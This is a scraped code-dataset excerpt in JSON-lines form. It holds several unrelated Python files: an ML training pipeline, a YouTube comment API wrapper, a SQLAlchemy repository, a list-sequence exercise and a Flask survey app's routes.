self.train_acc(step_output.token_class_predictions, step_output.token_class_labels)\n f1 = self.train_f1(step_output.token_class_predictions, step_output.token_class_labels)\n ppl = self.train_ppl(step_output.token_class_logits.float(), step_output.token_class_labels)\n\n self.log(LOSS, step_output.loss)\n self.log(TOKEN_CLASS_LOSS, step_output.token_class_loss)\n self.log(TOKEN_CLASS_ACCURACY, acc)\n self.log(TOKEN_CLASS_PERPLEXITY, ppl)\n self.log(TOKEN_CLASS_F1, f1)\n\n return step_output.loss\n\n def validation_step(self, batch, *args):\n r\"\"\" Operates on a single batch of data from the validation set.\n In this step you'd might generate examples or calculate anything of interest like accuracy.\n \"\"\"\n step_output = self.step(batch)\n\n valid_acc = self.valid_acc(\n step_output.token_class_predictions, step_output.token_class_labels\n )\n valid_f1 = self.valid_f1(step_output.token_class_predictions, step_output.token_class_labels)\n valid_ppl = self.valid_ppl(step_output.token_class_logits.float(), step_output.token_class_labels)\n\n self.log(LOSS, step_output.loss)\n self.log(TOKEN_CLASS_LOSS, step_output.token_class_loss)\n self.log(TOKEN_CLASS_ACCURACY, valid_acc)\n self.log(TOKEN_CLASS_F1, valid_f1)\n self.log(TOKEN_CLASS_PERPLEXITY, valid_ppl)\n\n def test_step(self, batch, *args):\n r\"\"\"\n Operates on a single batch of data from the test set.\n In this step you'd normally generate examples or calculate anything of interest such as accuracy.\n \"\"\"\n step_output = self.step(batch)\n \n test_acc = self.test_acc(step_output.token_class_predictions, step_output.token_class_labels)\n test_f1 = self.test_f1(step_output.token_class_predictions, step_output.token_class_labels)\n test_ppl = self.test_ppl(step_output.token_class_logits.float(), step_output.token_class_labels)\n\n self.log(LOSS, step_output.loss)\n self.log(TOKEN_CLASS_LOSS, step_output.token_class_loss)\n self.log(TOKEN_CLASS_ACCURACY, test_acc)\n self.log(TOKEN_CLASS_F1, test_f1)\n self.log(TOKEN_CLASS_PERPLEXITY, test_ppl)\n\n def postprocess(self, sample: Dict[str, Any]) -> Dict[str, Any]:\n r\"\"\" Process single samples to add denoising objective. \"\"\"\n return token_class_processor(\n sample=sample,\n input_column=self.hyperparameters.input_column,\n label_column=self.hyperparameters.label_column,\n tokenizer=self.tokenizer,\n max_sequence_length=self.hyperparameters.max_sequence_length,\n )\n\n @classmethod\n def add_argparse_args(cls, parser: FlexibleArgumentParser):\n super().add_argparse_args(parser)\n parser.add_argument('--input_column', type=str, required=True)\n parser.add_argument('--label_column', type=str, required=True)\n add_token_class_arguments(parser)\n","repo_name":"lucadiliello/transformers-framework","sub_path":"transformers_framework/pipelines/token_class/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":6303,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"81"} +{"seq_id":"16795272724","text":"from __future__ import annotations\n\nfrom datetime import datetime, timezone, timedelta\nimport json\nfrom typing import Optional\nfrom googleapiclient.discovery import build as get_youtube_api\nfrom googleapiclient.errors import HttpError\nfrom structlog import get_logger\n\nfrom config import (\n youtube_api_version,\n youtube_api_service_name,\n rob_miles_youtube_channel_id,\n youtube_api_key,\n)\nfrom utilities import Utilities\n\nlog = get_logger()\nutils = Utilities.get_instance()\n\nclass YoutubeAPI:\n \"\"\"Youtube API\"\"\"\n __instance: Optional[YoutubeAPI] = None\n YOUTUBE_API_KEY = youtube_api_key\n \n @staticmethod\n def get_instance() -> YoutubeAPI:\n if YoutubeAPI.__instance is None:\n return YoutubeAPI()\n return YoutubeAPI.__instance\n \n def __init__(self) -> None:\n if YoutubeAPI.__instance is not None:\n raise Exception(\n \"This class is a singleton! Access it using `Utilities.get_instance()`\"\n )\n YoutubeAPI.__instance = self\n self.class_name = self.__class__.__name__\n \n # dict to keep last timestamps in\n self.last_timestamp: dict[str, datetime] = {}\n\n # when was the most recent comment we saw posted?\n self.latest_comment_timestamp = datetime.now(timezone.utc)\n\n # when did we last hit the API to check for comments?\n self.last_check_timestamp = datetime.now(timezone.utc)\n\n # how many seconds should we wait before we can hit YT API again\n # this the start value. It doubles every time we don't find anything new\n self.youtube_cooldown = timedelta(seconds=60)\n\n # timestamp of last time we asked a youtube question\n self.last_question_asked_timestamp = datetime.now(timezone.utc)\n\n # Was the last message posted in #general by anyone, us asking a question from YouTube?\n # We start off not knowing, but it's better to assume yes than no\n self.last_message_was_youtube_question = True\n\n try:\n self.youtube = get_youtube_api(\n youtube_api_service_name,\n youtube_api_version,\n developerKey=self.YOUTUBE_API_KEY,\n )\n except HttpError:\n if self.YOUTUBE_API_KEY:\n log.info(self.class_name, msg=\"YouTube API Key is set but not correct\")\n else:\n log.info(self.class_name, msg=\"YouTube API Key is not set\")\n\n def rate_limit(self, timer_name: str, **kwargs) -> bool:\n \"\"\"Should I rate-limit? i.e. Has it been less than this length of time since the last time\n this function was called using the same `timer_name`?\n Used in a function like Module.tick() to make sure it doesn't run too often.\n For example, adding this at the top of a function that checks the youtube API:\n\n if utils.rate_limit(\"check youtube API\", seconds=30):\n return\n\n will cause the function to return early if it's been less than 30 seconds since it was last called.\n The keyword arguments are passed on to the timedelta object,\n so you can use 'seconds=', 'minutes=', 'hours=' etc, or combinations of them\n Note that this is all reset when Stampy reboots\n \"\"\"\n tick_cooldown = timedelta(**kwargs)\n now = datetime.now(timezone.utc)\n\n # if there's no timestamp stored for that name, store now and don't rate limit\n if timer_name not in self.last_timestamp:\n self.last_timestamp[timer_name] = now\n return False\n\n # if it's been long enough, update the timestamp and don't rate limit\n if (now - self.last_timestamp[timer_name]) > tick_cooldown:\n self.last_timestamp[timer_name] = now\n return False\n # it hasn't been long enough, rate limit\n return True\n\n\n def get_youtube_comment_replies(self, comment_url: str) -> list[dict]:\n url_arr = comment_url.split(\"&lc=\")\n reply_id = url_arr[-1].split(\".\")[0]\n request = self.youtube.comments().list(part=\"snippet\", parentId=reply_id)\n try:\n response = request.execute()\n except HttpError as err:\n if err.resp.get(\"content-type\", \"\").startswith(\"application/json\"):\n message = (\n json.loads(err.content).get(\"error\").get(\"errors\")[0].get(\"message\")\n )\n if message:\n log.error(self.class_name, error=message)\n return []\n log.error(self.class_name, error=\"Unknown Google API Error\")\n return []\n items: list[dict] = response.get(\"items\", [])\n replies = [self.parse_reply(item) for item in items]\n return replies\n \n @staticmethod\n def parse_reply(item: dict) -> dict:\n reply_id = item[\"id\"]\n username = item[\"snippet\"][\"authorDisplayName\"]\n text = item[\"snippet\"][\"textOriginal\"]\n timestamp = item[\"snippet\"][\"publishedAt\"][:-1]\n likes = item[\"snippet\"][\"likeCount\"]\n reply = {\n \"username\": username,\n \"reply\": reply_id,\n \"text\": text,\n \"title\": \"\",\n \"timestamp\": timestamp,\n \"likes\": likes,\n }\n return reply\n \n\n def get_youtube_comment(self, comment_url):\n url_arr = comment_url.split(\"&lc=\")\n video_url = url_arr[0]\n reply_id = url_arr[-1].split(\".\")[0]\n request = self.youtube.commentThreads().list(part=\"snippet\", id=reply_id)\n try:\n response = request.execute()\n except HttpError as err:\n if err.resp.get(\"content-type\", \"\").startswith(\"application/json\"):\n message = (\n json.loads(err.content).get(\"error\").get(\"errors\")[0].get(\"message\")\n )\n if message:\n log.error(self.class_name, error=message)\n return\n log.error(self.class_name, error=\"Unknown Google API Error\")\n return\n items = response.get(\"items\")\n comment = {\"video_url\": video_url}\n if items:\n top_level_comment = items[0][\"snippet\"][\"topLevelComment\"]\n comment[\"timestamp\"] = top_level_comment[\"snippet\"][\"publishedAt\"][:-1]\n comment[\"comment_id\"] = top_level_comment[\"id\"]\n comment[\"username\"] = top_level_comment[\"snippet\"][\"authorDisplayName\"]\n comment[\"likes\"] = top_level_comment[\"snippet\"][\"likeCount\"]\n comment[\"text\"] = top_level_comment[\"snippet\"][\"textOriginal\"]\n comment[\"reply_count\"] = items[0][\"snippet\"][\"totalReplyCount\"]\n else: # This happens if the comment was deleted from YT\n comment[\"timestamp\"] = datetime.isoformat(datetime.utcnow())\n comment[\"comment_id\"] = reply_id\n comment[\"username\"] = \"Unknown\"\n comment[\"likes\"] = 0\n comment[\"text\"] = \"\"\n comment[\"reply_count\"] = 0\n return comment\n\n def check_for_new_youtube_comments(self) -> Optional[list[dict]]:\n \"\"\"Consider getting the latest comments from the channel\n Returns a list of dicts if there are new comments\n Returns [] if it checked and there are no new ones\n Returns None if it didn't check because it's too soon to check again\"\"\"\n\n now = datetime.now(timezone.utc)\n\n if (now - self.last_check_timestamp) > self.youtube_cooldown:\n log.info(self.class_name, msg=\"Hitting YT API\")\n self.last_check_timestamp = now\n else:\n log.info(\n self.class_name,\n msg=f\"YT waiting >{self.youtube_cooldown - (now - self.last_check_timestamp)}\\t- \"\n )\n return None\n\n if self.youtube is None:\n log.info(\n f\"{self.class_name}: YouTube\",\n msg=\"WARNING: YouTube API Key is invalid or not set\",\n )\n self.youtube_cooldown = self.youtube_cooldown * 10\n return []\n\n request = self.youtube.commentThreads().list(\n part=\"snippet\", allThreadsRelatedToChannelId=rob_miles_youtube_channel_id\n )\n try:\n response = request.execute()\n except HttpError as err:\n if err.resp.get(\"content-type\", \"\").startswith(\"application/json\"):\n message = (\n json.loads(err.content).get(\"error\").get(\"errors\")[0].get(\"message\")\n )\n if message:\n log.error(self.class_name, error=message)\n return\n log.error(self.class_name, error=\"Unknown Google API Error\")\n return\n\n items = response.get(\"items\", None)\n if not items:\n # something broke, slow way down\n log.info(\n self.class_name,\n msg=\"YT comment checking broke. I got this response:\",\n )\n log.info(self.class_name, response=response)\n self.youtube_cooldown = self.youtube_cooldown * 10\n return None\n\n newest_timestamp = self.latest_comment_timestamp\n\n new_items = []\n for item in items:\n # Find when the comment was published\n timestamp = item[\"snippet\"][\"topLevelComment\"][\"snippet\"][\"publishedAt\"]\n # For some reason fromisoformat() doesn't like the trailing 'Z' on timestmaps\n # And we add the \"+00:00\" so it knows to use UTC\n published_timestamp = datetime.fromisoformat(timestamp[:-1] + \"+00:00\")\n\n # If this comment is newer than the newest one from last time we called API, keep it\n if published_timestamp > self.latest_comment_timestamp:\n new_items.append(item)\n\n # Keep track of which is the newest in this API call\n if published_timestamp > newest_timestamp:\n newest_timestamp = published_timestamp\n\n log.info(\n self.class_name,\n msg=f\"Got {len(items)} items, most recent published at {newest_timestamp}\"\n )\n\n # save the timestamp of the newest comment we found, so next API call knows what's fresh\n self.latest_comment_timestamp = newest_timestamp\n\n new_comments = [self.parse_comment(item) for item in new_items]\n \n log.info(\n self.class_name,\n msg=f\"Got {len(new_comments)} new comments since last check\",\n )\n\n if not new_comments:\n # we got nothing, double the cooldown period (but not more than 20 minutes)\n self.youtube_cooldown = min(\n self.youtube_cooldown * 2, timedelta(seconds=1200)\n )\n log.info(\n self.class_name,\n msg=f\"No new comments, increasing cooldown timer to {self.youtube_cooldown}\"\n )\n\n return new_comments\n \n \n \n @staticmethod\n def parse_comment(item: dict) -> dict:\n top_level_comment = item[\"snippet\"][\"topLevelComment\"]\n video_id = top_level_comment[\"snippet\"][\"videoId\"]\n comment_id = top_level_comment[\"id\"]\n username = top_level_comment[\"snippet\"][\"authorDisplayName\"]\n text = top_level_comment[\"snippet\"][\"textOriginal\"]\n timestamp = top_level_comment[\"snippet\"][\"publishedAt\"][:-1]\n likes = top_level_comment[\"snippet\"][\"likeCount\"]\n reply_count = item[\"snippet\"][\"totalReplyCount\"]\n comment = {\n \"url\": f\"https://www.youtube.com/watch?v={video_id}&lc={comment_id}\",\n \"username\": username,\n \"text\": text,\n \"title\": \"\",\n \"timestamp\": timestamp,\n \"likes\": likes,\n \"reply_count\": reply_count,\n }\n return comment\n\n \n\n def add_youtube_question(self, comment: dict):\n \"\"\"Get the video title from the video URL, without the comment id\n \"\"\"\n # TODO: do we need to actually parse the URL param properly? Order is hard-coded from get yt comment\n video_titles = utils.get_title(comment[\"url\"].split(\"&lc=\")[0])\n\n if not video_titles:\n # this should actually only happen in dev\n video_titles = [\"Video Title Unknown\", \"Video Title Unknown\"]\n\n display_title = f\"{comment['username']}'s question on {video_titles[0]}\"\n\n # TODO: add to Coda\n","repo_name":"StampyAI/stampy","sub_path":"api/youtube.py","file_name":"youtube.py","file_ext":"py","file_size_in_byte":12398,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"81"} +{"seq_id":"29945337731","text":"from skyviz.utils import logger\nfrom database.models import Base\n\nfrom sqlalchemy import Engine, select\nfrom sqlalchemy.orm import Mapped\n\nfrom datetime import datetime, timedelta\n\nlog = logger.create(__name__)\n'''\nSee the docs for writing SQL statements with SQLAlchemy 2.0 here:\nhttps://docs.sqlalchemy.org/en/20/orm/queryguide/index.html\n\nUnit of work pattern: https://docs.sqlalchemy.org/en/20/tutorial/orm_data_manipulation.html\n'''\n\n\nclass BaseRepository():\n '''\n Base class for database interfaces.\n '''\n def __init__(self, engine: Engine):\n self.engine = engine\n\n def calc_minutes_since_last_update(self, session, date_column: Mapped) -> float:\n '''\n Fetches the latest row in a table using the date_column,\n then calculates the time in minutes between the latest date and now.\n '''\n log.info(f'fetching most recent date in {date_column}')\n sql_query = select(date_column).order_by(date_column.desc()).limit(1)\n latest_date: datetime = session.execute(sql_query).scalar_one_or_none()\n log.info(f'{date_column} last updated: {latest_date}')\n time_since_last_update: timedelta = datetime.utcnow() - latest_date\n minutes_since_last_update: float = round(time_since_last_update.total_seconds() / 60, 1)\n log.info(f'calculated {minutes_since_last_update} minutes since last update')\n return minutes_since_last_update\n \n def count_total_rows(self, session, table_model: Base) -> int:\n '''\n Counts the number of rows in a table.\n '''\n log.info(f'counting rows in {table_model.__tablename__} table')\n count_result: int = session.query(table_model).count()\n log.info(f'counted {count_result} rows')\n return count_result\n\n def count_distinct(self, session, column: Mapped) -> int: # deprecated due to slow performance\n '''\n Counts the number of distinct values in a single column.\n '''\n log.info(f'counting distinct rows using table.column: {column}')\n count_result: int = session.query(column).distinct().count()\n log.info(f'counted {count_result} rows')\n return count_result\n","repo_name":"FPVian/sky-viz","sub_path":"src/skyviz/db/base_repo.py","file_name":"base_repo.py","file_ext":"py","file_size_in_byte":2189,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"36916553344","text":"import sys\nfrom math import sqrt\n\ndef read_list(list_n):\n n = int(input(\"Introduce the number of the elements: \"))\n print(\"The numbers are: \")\n for i in range(0, n):\n x = int(input())\n list_n.append(x)\n return list_n\n\ndef print_funct(list_n, start_poz, end_poz):\n if start_poz == 0 and end_poz == len(list_n) :\n print (\"The elements of the list are: \")\n else :\n print(\"This is the longest sequence which has the given property : \")\n for i in range (start_poz, end_poz):\n print(list_n[i])\n\ndef is_prime(n):\n \"\"\"Checks if an integer number n is prime.\n n - integer\n The function returns True if the number is prime\n and it returns False otherwise.\"\"\"\n \n if n == 2:\n return True\n if n < 2 or n % 2 == 0:\n return False\n for i in range(3, int(sqrt(n)) + 1, 2):\n if n % i == 0:\n return False\n return True\n\ndef long_prime(list_n):\n\n maxim = 0\n start_poz = -1\n end_poz = -1\n for i in range (len(list_n)-1):\n if is_prime(list_n[i]) == 1: \n l = 1 \n ok = 1\n stop = i + 1\n for j in range (i+1,len(list_n)-1): \n if ok == 1:\n if is_prime(list_n[j]) == 1:\n l += 1\n stop = j + 1\n else:\n ok = 0\n if maxim < l :\n maxim = l\n start_poz = i\n end_poz = stop\n if start_poz != -1 :\n print_funct(list_n, start_poz, end_poz + 1)\n else :\n print(\"There is not such a sequence!\")\n\ndef strict_incr(list_n):\n maxim = 0\n start_poz = -1\n end_poz= -1\n last_elem = 0\n for i in range (len(list_n)-1):\n l = 1\n ok = 1\n stop = i + 1\n last_elem = list_n[i]\n for j in range (i+1,len(list_n)):\n if ok == 1 :\n if last_elem < list_n[j] :\n l += 1\n last_elem = list_n[j]\n stop = j + 1\n else :\n ok = 0\n if maxim < l :\n maxim = l\n start_poz = i\n end_poz = stop\n print_funct(list_n, start_poz, end_poz)\n\n\ndef in_range(list_n):\n \"\"\"This function checks which numbers are in [0, 10] and prints out the\n longest sequence which satisfies this property.\"\"\"\n maxim = 0\n length = 0\n for i in range(0, len(list_n)):\n if list_n[i] > 0 and list_n[i] < 10:\n length +=1\n else:\n length = 0\n if length > maxim:\n maxim = length\n begin = i - length + 1\n \"\"\"for i in range(maxim):\n print(elements[i + begin])\"\"\"\n print_funct(list_n, begin, begin + maxim)\n\ndef single_nb(list_n):\n maxim = 0\n start_poz = -1\n end_poz = -1\n for i in range (len(list_n)-1):\n l = 1\n element = list_n[i]\n ok = 1\n stop = i + 1\n for j in range (i+1,len(list_n)):\n if ok == 1 :\n if list_n[j] == element :\n l+=1\n last_elem = list_n[j]\n stop = j + 1\n else:\n ok = 0\n if maxim < l :\n maxim = l\n start_poz = i\n end_poz = stop\n \n return list_n, start_poz, end_poz\n\ndef exit_funct(list_n):\n sys.exit()\n\ndef menu_options():\n print(\"0. Exit\")\n print(\"1. Help\")\n print(\"2. Read the list\")\n print(\"3. Print the list\")\n print(\"4. Print the longest sequence which contains only prime numbers\")\n print(\"5. Print the longest sequence which contains only increasing numbers\")\n print(\"6. Print the longest sequence which contains only numbers in range [0, 10]\")\n print(\"7. Print the longest sequence which contains only one number.\")\n\ndef main():\n print(\"\\n\\t Welcome to my app! For more information press 1!\")\n list_n = [1, 2, 4,2, 5, 6, 7, 1, 2,3, 4, 5]\n while True:\n opt = int(input(\"Input an option: \"))\n if opt == 1:\n menu_options()\n if opt == 2:\n read_list(list_n)\n if opt == 3:\n print_funct(list_n, 0, len(list_n))\n if opt == 4:\n long_prime(list_n)\n if opt == 5:\n strict_incr(list_n)\n if opt == 6:\n in_range(list_n)\n if opt == 7:\n a, b, c = single_nb(list_n)\n print_funct(a, b, c)\n if opt == 0:\n exit_funct(list_n)\n \n \nmain()\n","repo_name":"TeoMoisi/python-projects","sub_path":"lab2/lab2.py","file_name":"lab2.py","file_ext":"py","file_size_in_byte":4564,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"18134042691","text":"\"\"\"Rutas de la aplicacion\"\"\"\nfrom flask_login import LoginManager, login_user, logout_user, login_required, current_user\nfrom .consultas import *\nfrom .estructuraInterfaz import *\nfrom .modeluser import *\nfrom .decorators import *\nimport json\n\nfrom flask import current_app as app\nfrom flask import make_response, redirect, render_template, request\nfrom flask import Flask, request, jsonify\n\n\nfrom .models import *\nfrom .mail import *\n\nlogin_manager_app = LoginManager(app)\n\n\n@login_manager_app.user_loader\ndef load_user(id):\n return ModelUser.get_by_id(id)\n\n\n@app.route(\"/\")\ndef index():\n return render_template(\"login.html\")\n\n@app.route(\"/error\")\ndef error():\n return render_template(\"404error.html\")\n\n@app.route(\"/login\", methods=['GET', 'POST'])\ndef login():\n if request.method == 'POST':\n user = User(0, request.form['email'],\n request.form['password'], \"\", \"indefinido\", \"null\")\n logged_user = ModelUser.login(user)\n if logged_user != None:\n if logged_user.password:\n login_user(logged_user)\n if logged_user.rol == \"admin\":\n return redirect(url_for(\"dashboard_admin\"))\n else:\n return redirect(url_for(\"dashboard_user\"))\n else:\n return render_template(\"login.html\")\n else:\n return render_template(\"login.html\")\n else:\n return render_template(\"login.html\")\n\n\n@app.route(\"/logout\")\ndef logout():\n logout_user()\n return redirect(url_for(\"login\"))\n\n\n@app.route(\"/register\")\ndef register():\n return render_template(\"register.html\")\n\n\n@app.route(\"/register_user\", methods=['POST'])\ndef register_user():\n\n dataRegister = {\n \"email\": request.form['email'],\n \"password\": request.form['password'],\n \"name\": request.form['name'],\n \"apellido\": request.form['surname'],\n \"rut\": request.form['rut'],\n \"genero\": request.form.get(\"gender\"),\n \"fecha_nacimiento\": request.form['date']\n }\n\n return registrar_encuestado(dataRegister)\n\n\n@app.route(\"/ir_a_crear_nueva_encuesta\", methods=['GET'])\n@login_required\n@admin_required\ndef crea_nueva_encuesta():\n if db.session.query(Encuesta).order_by(Encuesta.id_encuesta.desc()).first() == None:\n return redirect(\"/survey/1/preguntas\")\n else:\n id_ultima_encuesta = db.session.query(Encuesta).order_by(\n Encuesta.id_encuesta.desc()).first().id_encuesta\n id_nueva = id_ultima_encuesta + 1\n return redirect(\"/survey/\"+str(id_nueva)+\"/preguntas\")\n\n\n@app.route(\"/ir_a_ultima_encuesta\", methods=['GET'])\n@login_required\n@admin_required\ndef ir_a_ultima_encuesta():\n if db.session.query(Encuesta).order_by(Encuesta.id_encuesta.desc()).first() == None:\n return redirect(\"/survey/1/preguntas\")\n else:\n id_ultima_encuesta = db.session.query(Encuesta).order_by(\n Encuesta.id_encuesta.desc()).first().id_encuesta\n return redirect(\"/survey/\"+str(id_ultima_encuesta)+\"/preguntas\")\n\n\n@app.route(\"/create_survey\", methods=['POST'])\n@login_required\n@admin_required\ndef create_survey():\n if request.method == 'POST':\n surveyData = request.get_json()\n return jsonify(guardar_encuesta(surveyData, current_user.id))\n\n\n@app.route(\"/modify_survey\", methods=['POST'])\n@login_required\n@admin_required\ndef modify_survey():\n if request.method == 'POST':\n surveyData = request.get_json()\n return jsonify(modificar_encuesta(surveyData))\n\n\n@app.route(\"/delete_survey\", methods=['POST'])\n@login_required\n@admin_required\ndef delete_survey():\n if request.method == 'POST':\n response = request.get_json()\n return jsonify(eliminar_encuesta(response[\"id_survey\"]))\n\n\n@app.route(\"/state_user\", methods=['POST'])\n@login_required\ndef state_user():\n if request.method == 'POST':\n response = json.loads(request.form.get(\"response\"))\n cambiar_estado_invitado(response)\n return response\n\n\n@app.route(\"/responder_encuesta\", methods=['POST'])\ndef responder_encuesta():\n if request.method == 'POST':\n responses = json.loads(request.form.get(\"responses\"))\n return guardar_respuesta(responses)\n return redirect(\"/\")\n\n\n@app.route(\"/agregar_usuario\", methods=['POST'])\ndef agregar_usuario():\n if request.method == 'POST':\n responses = json.loads(request.form.get(\"response\"))\n agregar_invitado(responses)\n return responses\n return redirect(\"/\")\n\n\n@app.route(\"/cambiar_estado_survey\", methods=['POST'])\ndef cambiar_estado_survey():\n if request.method == 'POST':\n responses = json.loads(request.form.get(\"response\"))\n cambiar_estado_encuesta(responses)\n return responses\n\n\n@app.route(\"/cambiar_configuracion_survey\", methods=['POST'])\ndef cambiar_configuracion_survey():\n if request.method == 'POST':\n responses = json.loads(request.form.get(\"surveyConfig\"))\n first_response = modificar_tiempo_limite(responses)\n secondary_response = asignar_asunto_y_mensaje(responses)\n return first_response + \" \" + secondary_response\n\n\n@app.route(\"/survey/\")\n@app.route(\"/survey//\")\n@app.route(\"/survey//\")\n@login_required\n@admin_required\ndef Survey(id_encuesta, section=\"preguntas\"):\n\n if section == \"preguntas\":\n if db.session.query(Encuesta).filter_by(id_encuesta=id_encuesta).first() == None:\n dataSurvey = {\n \"id\": id_encuesta,\n \"title\": \"\",\n \"description\": \"\",\n \"questions\": [],\n \"asigned\" : 0\n }\n return render_template(\"admin/survey.html\", data={\n\n \"url\": \"survey\",\n \"options\": [\"Preguntas\", \"Respuestas\", \"Usuarios\", \"Configuración\"],\n \"selected\": section,\n \"id\": id_encuesta,\n \"dataSurvey\": dataSurvey,\n \"textButton\": \"Guardar\"\n }\n )\n else:\n dataSurvey = crear_dataSurvey(id_encuesta)\n return render_template(\"admin/survey.html\", data={\n\n \"url\": \"survey\",\n \"options\": [\"Preguntas\", \"Respuestas\", \"Usuarios\", \"Configuración\"],\n \"selected\": section,\n \"id\": id_encuesta,\n \"dataSurvey\": dataSurvey,\n \"textButton\": \"Modificar\"\n }\n )\n elif section == \"respuestas\":\n\n return render_template(\"admin/survey.html\", data={\n \"url\": \"survey\",\n \"options\": [\"Preguntas\", \"Respuestas\", \"Usuarios\", \"Configuración\"],\n \"selected\": section,\n \"id\": id_encuesta,\n \"textButton\": \"Modificar\",\n \"dataAnswers\": obtener_respuestas_opcion(id_encuesta)\n }\n )\n elif section == \"usuarios\":\n return render_template(\"admin/survey.html\", data={\n \"url\": \"survey\",\n \"options\": [\"Preguntas\", \"Respuestas\", \"Usuarios\", \"Configuración\"],\n \"selected\": section,\n \"id\": id_encuesta,\n \"textButton\": \"Modificar\",\n \"dataUsers\": obtener_encuestados_responden(id_encuesta),\n }\n )\n elif section == \"configuración\":\n\n if db.session.query(Encuesta).filter_by(id_encuesta=id_encuesta).first() == None:\n dataSurvey = {\n \"id\": id_encuesta,\n \"title\": \"\",\n \"description\": \"\",\n \"questions\": []\n }\n return render_template(\"admin/survey.html\", data={\n \"url\": \"survey\",\n \"options\": [\"Preguntas\", \"Respuestas\", \"Usuarios\", \"Configuración\"],\n \"selected\": section,\n \"id\": id_encuesta,\n \"textButton\": \"Modificar\",\n \"dataSurvey\": dataSurvey\n }\n )\n\n else:\n return render_template(\"admin/survey.html\", data={\n \"url\": \"survey\",\n \"options\": [\"Preguntas\", \"Respuestas\", \"Usuarios\", \"Configuración\"],\n \"selected\": section,\n \"id\": id_encuesta,\n \"textButton\": \"Modificar\",\n \"dataSurvey\": crear_dataSurvey(id_encuesta)\n }\n )\n\n\n# Ruta de respuesta de encuesta\n@app.route(\"/answer_survey//\")\ndef answer_survey(url, id_encuesta):\n\n if (len(url) % 4 != 0 or len(url) == 0):\n return redirect(\"/invalid\")\n\n email = decodificar_mail(url)\n\n # Si no existe mail en la base de datos\n if (db.session.query(Encuestado).filter_by(email=email).first() == None):\n return redirect(\"/invalid\")\n\n encuesta = db.session.query(Encuesta).filter_by(\n id_encuesta=id_encuesta).first()\n\n # Si la encuesta existe\n if encuesta != None:\n\n # Comprobar fecha encuesta y si ya fue respondida por usuario\n if (comprobar_encuestado_encuesta(id_encuesta, email) == True):\n return render_template('403error.html')\n\n # Si la encuesta está activa\n if (encuesta.activa == True):\n\n dataSurvey = crear_dataSurvey(id_encuesta)\n return render_template(\"user/answer_survey.html\", data={\n\n \"selected\": \"answer\",\n \"dataSurvey\": dataSurvey,\n \"encuestado\": email,\n \"type\": comprobar_tipo_encuestado(email),\n \"role\": 'encuestado',\n \"title\": dataSurvey.get('title')\n })\n else:\n return render_template('403error.html')\n else:\n return redirect(\"/invalid\")\n\n# Enviar mails con encuestas\n@app.route(\"/mail_sent\", methods=['POST'])\ndef send_mail():\n if request.method == 'POST':\n response = request.get_json()\n send_mail = Send_Mail()\n responseEmail = send_mail.send_survey(response.get(\"id_survey\"))\n return jsonify(responseEmail)\n\n# Enviar mail de recuperación de contraseña\n@app.route(\"/send_code\",methods=['POST'])\ndef send_code():\n\n if request.method == 'POST':\n response = json.loads(request.form.get(\"response\"))\n\n send_mail = Send_Mail()\n return (send_mail.send_code(response['user_mail'], response['code']))\n\n@app.route(\"/password_reset\",methods=['POST'])\ndef password_reset():\n if request.method == 'POST':\n response = json.loads(request.form.get(\"response\"))\n\n return (cambiar_password(response['user'], response['password']))\n\n\n@app.route(\"/dashboard_admin/\")\n@app.route(\"/dashboard_admin/\")\n@app.route(\"/dashboard_admin//\")\n@login_required\n@admin_required\ndef dashboard_admin(section=\"encuestas\", active=\"false\"):\n\n if section == \"encuestas\":\n return render_template(\"admin/dashboardAdmin.html\", data={\n\n \"url\": \"dashboard_admin\",\n \"options\": [\"Encuestas\", \"Usuarios\"],\n \"selected\": section,\n \"active\": active,\n \"dataSurveys\": obtener_encuestas(),\n \"dataChart\": obtener_cantidad_registrados_e_invitados(),\n \"title\": \"Bienvenido \" + current_user.nombre\n }\n )\n elif section == \"usuarios\":\n return render_template(\"admin/dashboardAdmin.html\", data={\n\n \"url\": \"dashboard_admin\",\n \"options\": [\"Encuestas\", \"Usuarios\"],\n \"selected\": section,\n \"active\": active,\n \"dataUsers\": obtener_usuarios(),\n \"title\": \"Bienvenido \" + current_user.nombre\n }\n )\n\n\n@app.route(\"/aumentar_visita\", methods=['POST'])\ndef aumentar_visita():\n if request.method == 'POST':\n response = json.loads(request.form.get(\"id_survey\"))\n return aumentar_visitas(response)\n\n\n@app.route(\"/dashboard_user/\")\n@login_required\n@registrado_required\ndef dashboard_user():\n return render_template(\"myProfile.html\", data={\n \"url\": \"dashboard_user\",\n \"options\": [],\n \"selected\": \"\",\n \"active\": \"\",\n \"title\": \"Bienvenido \" + current_user.nombre,\n \"role\": 'encuestado',\n \"dataUser\": get_dataUser()\n })\n\n# Desunscribe encuestados\n@app.route(\"/unsubscribe/\")\ndef unsubscribe_mail(url):\n\n if (len(url) % 4 != 0 or len(url) == 0):\n return redirect(\"/invalid\")\n\n email = decodificar_mail(url)\n\n return desunscribir_encuestado(email)\n\n\n@app.route(\"/my_profile\")\n@login_required\ndef my_profile():\n\n return render_template(\"myProfile.html\", data={\n \"url\": \"dashboard_user\",\n \"options\": [],\n \"selected\": \"\",\n \"role\": current_user.rol,\n \"title\": \"Perfil de \" + current_user.nombre,\n \"dataUser\": get_dataUser()\n })\n\n\n@app.route(\"/recover_password\")\ndef recover_password():\n return render_template(\"recover_password.html\")\n\n\n@app.route(\"/change_avatar\", methods=['POST'])\ndef change_avatar():\n if request.method == 'POST':\n response = request.get_json()\n return jsonify(cambiar_avatar(response['user'], response['url']))","repo_name":"mellokx/Proyecto-Semestral-IS2","sub_path":"application/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":13040,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"21354198566","text":"#!usr/bin/python3\ndef divide(ml):\n pieces = []\n tmp = []\n for index in range(len(ml)):\n tmp.append(ml[index])\n try:\n if ml[index] >= ml[index+1]:\n pieces.append(tmp)\n tmp = []\n except IndexError:\n pieces.append(tmp)\n return pieces\ndef more_elements(ml):\n maxlen = 0\n more = 0\n for index in range(len(ml)):\n if len(ml[index]) > maxlen:\n maxlen = len(ml[index])\n more = ml[index]\n return more\n\ndef main():\n numbers = [12,1,3,4,25,13,17,32]\n llists = divide(numbers)\n score = more_elements(llists)\n 